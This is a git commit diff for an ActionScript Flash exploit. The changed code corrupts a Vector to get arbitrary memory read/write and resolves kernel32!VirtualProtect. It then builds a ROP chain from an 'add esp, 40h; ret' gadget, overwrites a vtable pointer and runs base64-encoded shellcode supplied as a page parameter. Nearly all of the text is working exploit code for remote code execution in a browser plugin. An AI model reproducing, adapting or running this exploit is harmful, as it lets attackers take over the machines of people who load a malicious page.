Back on track
parent
43b90610b1
commit
0c3329f69e
Binary file not shown.
|
@ -1,5 +1,6 @@
|
|||
package
|
||||
{
|
||||
import mx.utils.Base64Decoder;
|
||||
import flash.display.*;
|
||||
import flash.utils.ByteArray;
|
||||
import flash.external.ExternalInterface;
|
||||
|
@ -36,12 +37,8 @@ package
|
|||
private var junk:Array = new Array();
|
||||
private var junk_idx:int = 0;
|
||||
|
||||
public static function Alert(message:String):void {
|
||||
ExternalInterface.call('debug_alert', message);
|
||||
}
|
||||
|
||||
public static function Debug(message:String):void {
|
||||
ExternalInterface.call('debug_print', message);
|
||||
ExternalInterface.call('console.log', message);
|
||||
}
|
||||
|
||||
public function MakeRegex(c:String):String {
|
||||
|
@ -392,7 +389,7 @@ package
|
|||
// TODO: we can optimise here as we know the alignment of the
|
||||
// magic values.
|
||||
|
||||
Alert(' [-] ' + region_base.toString(16) + ' ' + region_top.toString(16) + '[' + region_rtop.toString(16) + ']');
|
||||
Debug(' [-] ' + region_base.toString(16) + ' ' + region_top.toString(16) + '[' + region_rtop.toString(16) + ']');
|
||||
|
||||
for (var ptr:uint = region_base; ptr < region_top - 16; ptr += 4) {
|
||||
if (m.read_dword(ptr) == 0xdecafbad
|
||||
|
@ -410,16 +407,6 @@ package
|
|||
return 0;
|
||||
}
|
||||
|
||||
public function GetShellcodeParam():String {
|
||||
var b64:Base64Decoder = new Base64Decoder();
|
||||
var payload:String = "";
|
||||
Alert("Gonna decode");
|
||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh);
|
||||
Alert("Finished Decode");
|
||||
payload = b64.toByteArray().toString();
|
||||
return payload;
|
||||
}
|
||||
|
||||
public function WriteShellcode(v:Vector.<uint>, i:uint, ptr:uint, fun:uint):void {
|
||||
|
||||
// at this point we are sandwiched on the stack between the current
|
||||
|
@ -473,11 +460,16 @@ package
|
|||
v[i++] = 0x9090e0ff; // FFE0 jmp eax
|
||||
}
|
||||
|
||||
public function GetPayload():String {
|
||||
var b64:Base64Decoder = new Base64Decoder();
|
||||
var p:String = LoaderInfo(this.root.loaderInfo).parameters.sh;
|
||||
b64.decode(p);
|
||||
var payload:String = b64.toByteArray().toString();
|
||||
return payload;
|
||||
}
|
||||
|
||||
public function Main() {
|
||||
Alert("1");
|
||||
var sh:String = GetShellcodeParam();
|
||||
Alert("2");
|
||||
Debug("Shellcoe: " + sh.toString());
|
||||
var payload:String = GetPayload();
|
||||
|
||||
i = 0;
|
||||
|
||||
|
@ -488,7 +480,7 @@ package
|
|||
return;
|
||||
}
|
||||
|
||||
Alert('hai');
|
||||
Debug("Corrupting Vector");
|
||||
|
||||
var v:Vector.<uint> = CorruptVector(r);
|
||||
if (v == null) {
|
||||
|
@ -496,7 +488,6 @@ package
|
|||
return;
|
||||
}
|
||||
|
||||
Alert("Memory");
|
||||
var m:Memory = new Memory(v, v[0], 0x6e);
|
||||
|
||||
// at this point we have an absolute read/write primitive letting
|
||||
|
@ -533,9 +524,9 @@ package
|
|||
var virtual_protect:uint = p.GetImport('KERNEL32.dll', 'VirtualProtect');
|
||||
Debug(' [-] ' + virtual_protect.toString(16) + ' kernel32!VirtualProtect');
|
||||
|
||||
// Find this in Flash
|
||||
// 81 c4 40 00 00 00 add esp, 40h
|
||||
// c3 ret
|
||||
|
||||
var gadget_bytes:ByteArray = new ByteArray();
|
||||
gadget_bytes.length = 7;
|
||||
gadget_bytes.writeByte(0x81);
|
||||
|
@ -582,22 +573,22 @@ package
|
|||
|
||||
var a:uint = 0x61616161;
|
||||
pwned.Rop(
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a,
|
||||
a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a);
|
||||
a, a, a, a, a, a, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret,
|
||||
ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, ret, add_esp_40h_ret);
|
||||
|
||||
// overwrite the method pointer
|
||||
m.write_dword(vtable_ptr + 4, add_esp_40h_ret);
|
||||
|
|
Loading…
Reference in New Issue